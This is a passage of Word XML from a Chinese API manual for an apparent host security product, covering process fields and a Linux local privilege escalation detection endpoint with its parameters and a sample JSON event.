            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A2D460" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="709F5D38" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42B3BC49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="044B1709" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FBF77EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F68C01F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B4EB009" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CC82634" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fileMode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="156E7248" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49230262" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1F355A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>完整文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F24513F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C42A27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>euidUserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1491EEB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D7EAB95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F893E35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>euid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42EB9814" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F4D9721" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EABC47F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E9E318C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15DFB9E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命令行参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="633603D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>注意： windows返回信息中没有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>中特有的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>等字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3E415F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="_Toc115166225"/>
      <w:bookmarkStart w:id="306" w:name="本地提权"/>
      <w:bookmarkEnd w:id="302"/>
      <w:bookmarkEnd w:id="304"/>
      <w:r>
        <w:t>本地提权</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
    </w:p>
    <w:p w14:paraId="315EB36D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="307" w:name="_Toc115166226"/>
      <w:bookmarkStart w:id="308" w:name="linux本地提权查询结果"/>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>本地提权查询</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="307"/>
    </w:p>
    <w:p w14:paraId="1916353E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>本地提权上报</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>事件的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04053A6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F5C8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localrights</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17AEC88C"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639"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A13241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7505A3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50A26C30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="021D56B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A9465D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B555BAB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B5CB8C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F28D6F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCBE8E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45B27C3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DD71707" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44AAA6B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61CA43B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2793EA9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="709C78E7" w14:textId="0C52B0DF" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5033112F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F9B2A9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EBE4596" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64807E35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="307694B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52A6BB01" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52270B78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>procName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EEFDACD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12A9CD02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="172A73BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>提权进程</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="408C530C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6160E8AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>procUserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DCB5AD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D67C436" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70DF45F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>提权用户</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="625ADB48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529B56E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localrights</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61145D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356FBB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "979f3c4d44b2e765",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 37,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tianxianhu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "time": 1529984917,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>procPid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67537,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>procName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>procPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>procUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>procGroupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>procFileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "104755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentProcPid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 67533,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentProcName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_(1)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentProcPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/home/test/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_(1)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentProcUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
